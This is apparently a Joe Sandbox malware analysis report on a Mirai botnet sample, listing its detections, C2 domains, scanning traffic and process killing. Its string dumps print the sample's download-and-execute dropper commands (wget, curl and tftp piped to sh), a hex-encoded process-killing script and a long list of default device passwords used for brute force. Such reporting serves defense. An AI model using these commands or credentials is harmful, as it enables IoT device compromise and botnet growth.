Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
rep.m68k.elf

Overview

General Information

Sample name:rep.m68k.elf
Analysis ID:1611387
MD5:cfff79e21c17348e5376bc67693f5f76
SHA1:5430fb02aa571e0ad3982a8a97e37f3b43e0afb9
SHA256:fa6e131d99e29db4cea6dcbd8318782577338bf5f85ec0135d2b592761cec86c
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai
Score:76
Range:0 - 100

Signatures

Multi AV Scanner detection for submitted file
Yara detected Mirai
Connects to many ports of the same IP (likely port scanning)
Sample tries to kill multiple processes (SIGKILL)
Sends malformed DNS queries
Detected TCP or UDP traffic on non-standard ports
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Joe Sandbox version:42.0.0 Malachite
Analysis ID:1611387
Start date and time:2025-02-10 20:42:28 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 3m 43s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:rep.m68k.elf
Detection:MAL
Classification:mal76.spre.troj.linELF@0/0@11/0
  • VT rate limit hit for: polizei.su
Command:/tmp/rep.m68k.elf
PID:6240
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
The Peoples Bank of China.
Standard Error:
  • system is lnxubuntu20
  • sh (PID: 6269, Parent: 1477, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-wacom
  • gdm3 New Fork (PID: 6275, Parent: 1320)
  • Default (PID: 6275, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • gdm3 New Fork (PID: 6282, Parent: 1320)
  • Default (PID: 6282, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • xfdesktop (PID: 6285, Parent: 1900, MD5: dfb13e1581f80065dcea16f2476f16f2) Arguments: xfdesktop --display :1.0 --sm-client-id 29178b886-02e2-48f2-9471-8dbd02206542
  • xfce4-panel (PID: 6287, Parent: 1900, MD5: a15b657c7d54ac1385f1f15004ea6784) Arguments: xfce4-panel --display :1.0 --sm-client-id 2b4cc744e-8b9d-436f-9a4a-312b40faa2ec
  • xfdesktop (PID: 6291, Parent: 1900, MD5: dfb13e1581f80065dcea16f2476f16f2) Arguments: xfdesktop --display :1.0 --sm-client-id 29178b886-02e2-48f2-9471-8dbd02206542
  • xfce4-panel (PID: 6293, Parent: 1900, MD5: a15b657c7d54ac1385f1f15004ea6784) Arguments: xfce4-panel --display :1.0 --sm-client-id 2b4cc744e-8b9d-436f-9a4a-312b40faa2ec
  • xfwm4 (PID: 6295, Parent: 1900, MD5: 59defa3c00cc30d85ed77b738d55e9da) Arguments: xfwm4 --display :1.0 --sm-client-id 2389ab8d9-421f-49fc-90ad-c6cc4c15ac4c
  • xfdesktop (PID: 6297, Parent: 1900, MD5: dfb13e1581f80065dcea16f2476f16f2) Arguments: xfdesktop --display :1.0 --sm-client-id 29178b886-02e2-48f2-9471-8dbd02206542
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
rep.m68k.elfJoeSecurity_Mirai_9Yara detected MiraiJoe Security
    rep.m68k.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      SourceRuleDescriptionAuthorStrings
      6246.1.00007fe3bc001000.00007fe3bc019000.r-x.sdmpJoeSecurity_Mirai_9Yara detected MiraiJoe Security
        6246.1.00007fe3bc001000.00007fe3bc019000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          6244.1.00007fe3bc001000.00007fe3bc019000.r-x.sdmpJoeSecurity_Mirai_9Yara detected MiraiJoe Security
            6244.1.00007fe3bc001000.00007fe3bc019000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
              6240.1.00007fe3bc001000.00007fe3bc019000.r-x.sdmpJoeSecurity_Mirai_9Yara detected MiraiJoe Security
                Click to see the 1 entries
                No Suricata rule has matched

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: rep.m68k.elfReversingLabs: Detection: 39%
                Source: rep.m68k.elfString: /bin/busyboxenablelinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd sh .k/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | sh/bin/busybox chmod +x lzrd; ./lzrd; ./rep.i486 selfrep; ./rep.x86 selfrep; ./rep.i686 selfrep; ./rep.x86_64 selfrep; ./rep.mips selfrep; ./rep.mpsl selfrep; ./rep.arm4 selfrep; ./rep.arm5 selfrep; ./rep.arm6 selfrep; ./rep.arm7 selfrep; ./rep.ppc selfrep; ./rep.spc selfrep; ./rep.m68k selfrep; ./rep.sh4 selfrep; ./rep.arc selfrepThe People's/var//var/run//var/tmp//dev//dev/shm//etc//mnt//usr//boot//home/"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63""\x2F\x2A\x3B\x20\x64\x6F\x0A\x20\x20\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A""\x20\x20\x20\x20\x72\x65\x73\x75\x6C\x74\x3D\x24\x28\x6C\x73\x20\x2D\x6C\x20\x22\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x65""\x78\x65\x22\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x20\x20\x69\x66\x20\x5B\x20\x22\x24\x72\x65""\x73\x75\x6C\x74\x22\x20\x21\x3D\x20\x22\x24\x7B\x72\x65\x73\x75\x6C\x74\x25\x28\x64\x65\x6C\x65\x74\x65\x64\x29\x7D\x22\x20\x5D""\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x6B\x69\x6C\x6C\x20\x2D\x39\x20\x22\x24\x70\x69\x64\x22\x0A\x20\x20""\x20\x20\x66\x69\x0A\x64\x6F\x6E\x65\x0A"armarm5arm6arm7mipsmpslppcspcsh4

                Networking

                barindex
                Source: global trafficTCP traffic: 185.93.89.106 ports 38241,1,2,3,4,8
                Source: global trafficDNS traffic detected: malformed DNS query: kittler.ru. [malformed]
                Source: global trafficDNS traffic detected: malformed DNS query: cats-master.ru. [malformed]
                Source: global trafficDNS traffic detected: malformed DNS query: gokittler.ru. [malformed]
                Source: global trafficDNS traffic detected: malformed DNS query: polizei.su. [malformed]
                Source: global trafficDNS traffic detected: malformed DNS query: qittler.ru. [malformed]
                Source: global trafficDNS traffic detected: malformed DNS query: newkittler.ru. [malformed]
                Source: global trafficDNS traffic detected: malformed DNS query: thekittler.ru. [malformed]
                Source: global trafficTCP traffic: 192.168.2.23:39702 -> 185.93.89.106:38241
                Source: /tmp/rep.m68k.elf (PID: 6240)Socket: 127.0.0.1:39148Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
                Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
                Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
                Source: unknownTCP traffic detected without corresponding DNS query: 93.26.209.182
                Source: unknownTCP traffic detected without corresponding DNS query: 122.48.91.69
                Source: unknownTCP traffic detected without corresponding DNS query: 93.26.209.182
                Source: unknownTCP traffic detected without corresponding DNS query: 6.103.233.186
                Source: unknownTCP traffic detected without corresponding DNS query: 122.48.91.69
                Source: unknownTCP traffic detected without corresponding DNS query: 23.161.186.251
                Source: unknownTCP traffic detected without corresponding DNS query: 6.103.233.186
                Source: unknownTCP traffic detected without corresponding DNS query: 23.161.186.251
                Source: unknownTCP traffic detected without corresponding DNS query: 1.55.143.238
                Source: unknownTCP traffic detected without corresponding DNS query: 1.55.143.238
                Source: unknownTCP traffic detected without corresponding DNS query: 193.144.213.93
                Source: unknownTCP traffic detected without corresponding DNS query: 193.144.213.93
                Source: unknownTCP traffic detected without corresponding DNS query: 156.192.65.183
                Source: unknownTCP traffic detected without corresponding DNS query: 156.192.65.183
                Source: unknownTCP traffic detected without corresponding DNS query: 19.193.139.119
                Source: unknownTCP traffic detected without corresponding DNS query: 74.157.102.227
                Source: unknownTCP traffic detected without corresponding DNS query: 19.193.139.119
                Source: unknownTCP traffic detected without corresponding DNS query: 74.157.102.227
                Source: unknownTCP traffic detected without corresponding DNS query: 112.227.42.31
                Source: unknownTCP traffic detected without corresponding DNS query: 112.227.42.31
                Source: unknownTCP traffic detected without corresponding DNS query: 74.243.8.166
                Source: unknownTCP traffic detected without corresponding DNS query: 74.243.8.166
                Source: unknownTCP traffic detected without corresponding DNS query: 90.36.37.183
                Source: unknownTCP traffic detected without corresponding DNS query: 90.36.37.183
                Source: unknownTCP traffic detected without corresponding DNS query: 185.82.7.101
                Source: unknownTCP traffic detected without corresponding DNS query: 15.235.205.38
                Source: unknownTCP traffic detected without corresponding DNS query: 185.82.7.101
                Source: unknownTCP traffic detected without corresponding DNS query: 144.45.169.118
                Source: unknownTCP traffic detected without corresponding DNS query: 15.235.205.38
                Source: unknownTCP traffic detected without corresponding DNS query: 113.208.61.251
                Source: unknownTCP traffic detected without corresponding DNS query: 144.45.169.118
                Source: unknownTCP traffic detected without corresponding DNS query: 113.208.61.251
                Source: unknownTCP traffic detected without corresponding DNS query: 53.90.244.177
                Source: unknownTCP traffic detected without corresponding DNS query: 53.90.244.177
                Source: unknownTCP traffic detected without corresponding DNS query: 30.34.11.73
                Source: unknownTCP traffic detected without corresponding DNS query: 30.34.11.73
                Source: unknownTCP traffic detected without corresponding DNS query: 24.142.234.236
                Source: unknownTCP traffic detected without corresponding DNS query: 24.142.234.236
                Source: unknownTCP traffic detected without corresponding DNS query: 13.127.161.233
                Source: unknownTCP traffic detected without corresponding DNS query: 13.127.161.233
                Source: unknownTCP traffic detected without corresponding DNS query: 132.255.181.26
                Source: unknownTCP traffic detected without corresponding DNS query: 132.255.181.26
                Source: unknownTCP traffic detected without corresponding DNS query: 62.184.16.178
                Source: unknownTCP traffic detected without corresponding DNS query: 98.171.5.218
                Source: unknownTCP traffic detected without corresponding DNS query: 62.184.16.178
                Source: unknownTCP traffic detected without corresponding DNS query: 98.171.5.218
                Source: unknownTCP traffic detected without corresponding DNS query: 138.58.247.108
                Source: unknownTCP traffic detected without corresponding DNS query: 138.58.247.108
                Source: unknownTCP traffic detected without corresponding DNS query: 196.137.119.207
                Source: unknownTCP traffic detected without corresponding DNS query: 196.137.119.207
                Source: global trafficDNS traffic detected: DNS query: polizei.su
                Source: global trafficDNS traffic detected: DNS query: cuttiecats.ru
                Source: global trafficDNS traffic detected: DNS query: kittler.ru. [malformed]
                Source: global trafficDNS traffic detected: DNS query: mykittler.ru
                Source: global trafficDNS traffic detected: DNS query: cats-master.ru. [malformed]
                Source: global trafficDNS traffic detected: DNS query: gokittler.ru. [malformed]
                Source: global trafficDNS traffic detected: DNS query: polizei.su. [malformed]
                Source: global trafficDNS traffic detected: DNS query: qittler.ru. [malformed]
                Source: global trafficDNS traffic detected: DNS query: newkittler.ru. [malformed]
                Source: global trafficDNS traffic detected: DNS query: cats-master.ru
                Source: global trafficDNS traffic detected: DNS query: thekittler.ru. [malformed]
                Source: rep.m68k.elfString found in binary or memory: http:///curl.sh
                Source: rep.m68k.elfString found in binary or memory: http:///wget.sh
                Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443

                System Summary

                barindex
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 720, result: successfulJump to behavior
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 721, result: successfulJump to behavior
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 788, result: successfulJump to behavior
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 884, result: successfulJump to behavior
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 904, result: successfulJump to behavior
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 1475, result: successfulJump to behavior
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 1576, result: successfulJump to behavior
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 1601, result: successfulJump to behavior
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 1877, result: successfulJump to behavior
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 1900, result: successfulJump to behavior
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 1983, result: successfulJump to behavior
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 2028, result: successfulJump to behavior
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 2048, result: successfulJump to behavior
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 2050, result: successfulJump to behavior
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 2062, result: successfulJump to behavior
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 2063, result: successfulJump to behavior
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 2069, result: successfulJump to behavior
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 2074, result: successfulJump to behavior
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 2096, result: successfulJump to behavior
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 2097, result: successfulJump to behavior
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 2102, result: successfulJump to behavior
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 2123, result: successfulJump to behavior
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 2126, result: successfulJump to behavior
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 6225, result: successfulJump to behavior
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 6244, result: successfulJump to behavior
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 6246, result: successfulJump to behavior
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 6276, result: successfulJump to behavior
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 6283, result: successfulJump to behavior
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 6284, result: successfulJump to behavior
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 6285, result: successfulJump to behavior
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 6286, result: successfulJump to behavior
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 6287, result: successfulJump to behavior
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 6288, result: successfulJump to behavior
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 6289, result: successfulJump to behavior
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 6290, result: successfulJump to behavior
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 6291, result: successfulJump to behavior
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 6292, result: successfulJump to behavior
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 6293, result: successfulJump to behavior
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 6294, result: successfulJump to behavior
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 6295, result: successfulJump to behavior
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 6296, result: successfulJump to behavior
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 6297, result: successfulJump to behavior
                Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne
                Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne >> > .dPon521Zte521root621oelinux123wabjtamZxic521tsgoingonxc3511solokeydefaulta1sev5y7c39khkipc2016unisheenFireituphslwificam5upjvbzd1001chinsystemzlxx.7ujMko0vizxv1234horsesantslqxc12345xmhdipcicatch99founder88xirtamtaZz@01/*6.=_jat0talc0ntr0l4!7ujMko0admintelecomadminipcam_rt5350juantechdreamboxIPCam@swzhongxinghi3518hg2x0dropperipc71aroot123ipcamgrouterGM8182200808263ep5w2uadmin1234admin@123BrAhMoS@15GeNeXiS@19firetide2601hxservicepasswordsupportadmintelnetadminadmintelecomguestftpnobody1cDuLJ7ctlJwpbo6S2fGqNFsOxhlwSG8tluafedbin20150602vstarcam2015supporthikvisione8ehomeasbe8telnetciscopass123sascottmotorolaROOT500zte9x15cisco123smcadmincolasoftcsadminadminadminsysmanager888sysmanagerfirewallsys123!1fw@2soc#3vpncyberauditsafetybasehillstonetalentsupermaneyouusereyou_adminadmin@(eyou)eyougw+-ccccccyouadmintelentadministratoradminpwdvenus70Auditlenovovenus60adminerleadsec.wafadminer3100adminer3200adminer3260leadsec1234567root12345root123456root12345678root12345678987654321root12345678
                Source: Initial sampleString containing 'busybox' found: /bin/busybox
                Source: Initial sampleString containing 'busybox' found: usage: busybox
                Source: Initial sampleString containing 'busybox' found: /bin/busybox hostname PBOC
                Source: Initial sampleString containing 'busybox' found: /bin/busybox echo >
                Source: Initial sampleString containing 'busybox' found: /bin/busybox wget http://
                Source: Initial sampleString containing 'busybox' found: /wget.sh -O- | sh;/bin/busybox tftp -g
                Source: Initial sampleString containing 'busybox' found: -r tftp.sh -l- | sh;/bin/busybox ftpget
                Source: Initial sampleString containing 'busybox' found: /bin/busybox chmod +x lzrd; ./lzrd; ./rep.i486 selfrep; ./rep.x86 selfrep; ./rep.i686 selfrep; ./rep.x86_64 selfrep; ./rep.mips selfrep; ./rep.mpsl selfrep; ./rep.arm4 selfrep; ./rep.arm5 selfrep; ./rep.arm6 selfrep; ./rep.arm7 selfrep; ./rep.ppc selfrep; ./rep.spc selfrep; ./rep.m68k selfrep; ./rep.sh4 selfrep; ./rep.arc selfrep
                Source: Initial sampleString containing 'busybox' found: /bin/busyboxenablelinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd sh .k/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | sh/bin/busybox chmod +x lzrd; ./lzrd; ./rep.i486 selfrep; ./rep.x86 selfrep; ./rep.i686 selfrep; ./rep.x86_64 selfrep; ./rep.mips selfrep; ./rep.mpsl selfrep; ./rep.arm4 selfrep; ./rep.arm5 selfrep; ./rep.arm6 selfrep; ./rep.arm7 selfrep; ./rep.ppc selfrep; ./rep.spc selfrep; ./rep.m68k selfrep; ./rep.sh4 selfrep; ./rep.arc selfrepThe People's/var//var/run//var/tmp//dev//dev/shm//etc//mnt//usr//boot//home/"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63""\x2F\x2A\x3B\x20\x64\x6F\x0A\x20\x20\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A""\x20\x20\x20\x20\x72\x65\x73\x75\x6C\x74\x3D\x24\x28\x6C\x73\x20\x
                Source: ELF static info symbol of initial sample.symtab present: no
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 720, result: successfulJump to behavior
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 721, result: successfulJump to behavior
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 788, result: successfulJump to behavior
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 884, result: successfulJump to behavior
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 904, result: successfulJump to behavior
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 1475, result: successfulJump to behavior
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 1576, result: successfulJump to behavior
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 1601, result: successfulJump to behavior
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 1877, result: successfulJump to behavior
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 1900, result: successfulJump to behavior
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 1983, result: successfulJump to behavior
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 2028, result: successfulJump to behavior
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 2048, result: successfulJump to behavior
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 2050, result: successfulJump to behavior
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 2062, result: successfulJump to behavior
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 2063, result: successfulJump to behavior
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 2069, result: successfulJump to behavior
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 2074, result: successfulJump to behavior
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 2096, result: successfulJump to behavior
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 2097, result: successfulJump to behavior
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 2102, result: successfulJump to behavior
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 2123, result: successfulJump to behavior
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 2126, result: successfulJump to behavior
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 6225, result: successfulJump to behavior
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 6244, result: successfulJump to behavior
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 6246, result: successfulJump to behavior
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 6276, result: successfulJump to behavior
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 6283, result: successfulJump to behavior
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 6284, result: successfulJump to behavior
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 6285, result: successfulJump to behavior
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 6286, result: successfulJump to behavior
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 6287, result: successfulJump to behavior
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 6288, result: successfulJump to behavior
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 6289, result: successfulJump to behavior
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 6290, result: successfulJump to behavior
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 6291, result: successfulJump to behavior
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 6292, result: successfulJump to behavior
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 6293, result: successfulJump to behavior
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 6294, result: successfulJump to behavior
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 6295, result: successfulJump to behavior
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 6296, result: successfulJump to behavior
                Source: /tmp/rep.m68k.elf (PID: 6248)SIGKILL sent: pid: 6297, result: successfulJump to behavior
                Source: classification engineClassification label: mal76.spre.troj.linELF@0/0@11/0
                Source: /tmp/rep.m68k.elf (PID: 6240)Queries kernel information via 'uname': Jump to behavior
                Source: rep.m68k.elfBinary or memory string: vmware
                Source: rep.m68k.elf, 6240.1.00007ffc8e14a000.00007ffc8e16b000.rw-.sdmp, rep.m68k.elf, 6244.1.00007ffc8e14a000.00007ffc8e16b000.rw-.sdmp, rep.m68k.elf, 6246.1.00007ffc8e14a000.00007ffc8e16b000.rw-.sdmpBinary or memory string: /usr/bin/qemu-m68k
                Source: rep.m68k.elfBinary or memory string: vmware123
                Source: rep.m68k.elf, 6240.1.00005558537c4000.0000555853849000.rw-.sdmp, rep.m68k.elf, 6244.1.00005558537c4000.0000555853849000.rw-.sdmp, rep.m68k.elf, 6246.1.00005558537c4000.0000555853849000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/m68k
                Source: rep.m68k.elfBinary or memory string: /bin/busybox echo -ne >> > .dPon521Zte521root621oelinux123wabjtamZxic521tsgoingonxc3511solokeydefaulta1sev5y7c39khkipc2016unisheenFireituphslwificam5upjvbzd1001chinsystemzlxx.7ujMko0vizxv1234horsesantslqxc12345xmhdipcicatch99founder88xirtamtaZz@01/*6.=_jat0talc0ntr0l4!7ujMko0admintelecomadminipcam_rt5350juantechdreamboxIPCam@swzhongxinghi3518hg2x0dropperipc71aroot123ipcamgrouterGM8182200808263ep5w2uadmin1234admin@123BrAhMoS@15GeNeXiS@19firetide2601hxservicepasswordsupportadmintelnetadminadmintelecomguestftpnobody1cDuLJ7ctlJwpbo6S2fGqNFsOxhlwSG8tluafedbin20150602vstarcam2015supporthikvisione8ehomeasbe8telnetciscopass123sascottmotorolaROOT500zte9x15cisco123smcadmincolasoftcsadminadminadminsysmanager888sysmanagerfirewallsys123!1fw@2soc#3vpncyberauditsafetybasehillstonetalentsupermaneyouusereyou_adminadmin@(eyou)eyougw+-ccccccyouadmintelentadministratoradminpwdvenus70Auditlenovovenus60adminerleadsec.wafadminer3100adminer3200adminer3260leadsec1234567root12345root123456root12345678root12345678987654321root1234567890abc123rulehuawei@1234huaweitelnetpwdtelnetuserftppwdftpuserAdmin@123h3capadminh3cvenus.fwvenus.auditvenus.useruseradminweboperwebauditconadmin1q2w3e1q2w3e4rauditoroperatoradmin666admin12345admin123456weblogicROOTweblogic123test123synnettomcattomcat1231234qwerreecam4dettnetip400ho4uku6atPlcmSpIpchangemepa55w0rdpublicfivranneubntpassServ4EMCklv1234ahetzip8awind5885buhAdministratorrooterCenturyL1nkankoivdevrealtekBGCVDSL2adslolitecip3000calvincat1029comcomcom!roothunt5759extendnetfliradminusuariogvt12345zyad1234supervisorqrstklv123davoxzsun1188xad#12bayandsl3wareradius3UJUh2VemEfUtetoorbintecUq-4GIt3Mwysecoolphoenix579nE7jA%5mmicrobusinessPASSWORDmeinsmcms500adslnadamgiraff666666zoomadslIs@dminsuperadminikwbalpineasantepuconexantaquariotinitsunamivertex25ektks123inflectionip20anicuscADMINpermitpldtadmindvr2580222Win1doW$true12341234JVC3500/24sitecom46ironport88888888uClinuxvolition2800tslinuxsecurityatlantisnCwMnJVGagbaby00000000openeleckont2004rpitc123123696969362729atc456hp.comcycl3R0cks!letaclanosoup4u11111111Gin51mvf3merlinmg350099999999admin1anni2013mlusrlogin3333333adminpldtchangeme2bbsd-clientsupport123aerohiveadmin00vmware123utstartl789l3tm31nseiko2005tivonpw,ba23422222222admintrupt1789admdarkhighspeedcusadminascendMenarasysAdminoracleanicustwbox123attackAscendAitbISP4eCiGadmin@mymifidPZb4GJTu9ROOMeins1988piloucomcastsetupZmqVfoSIPmichelangeloCOadmin123Zntslqblendervt100admin_1pfsensehellotest1my_DEMARCjvswitchezdvr7ujMko0root/ADMIN/adminlvjh123adminlvjh2010vstaxmhdpicruntop10qwertyQwestM0demqweasdzxguest123h2014071TANDBERGWprootarkeiachangemenowf00b@rartica9311wwwsurtsuperiwkbadmintesthuigu309UsernetscreenpitaZz@23495859Root1password123fidel123annie2016asdfghdottietwe8ehomebatman123hackedwelcomeyellowD13hh[china123p@ssw0rdjordanhackmewagodasdec1patrickgforgeEminemspidermansparkypassword1shadowgatewaydiamondprincessflowerchelsearic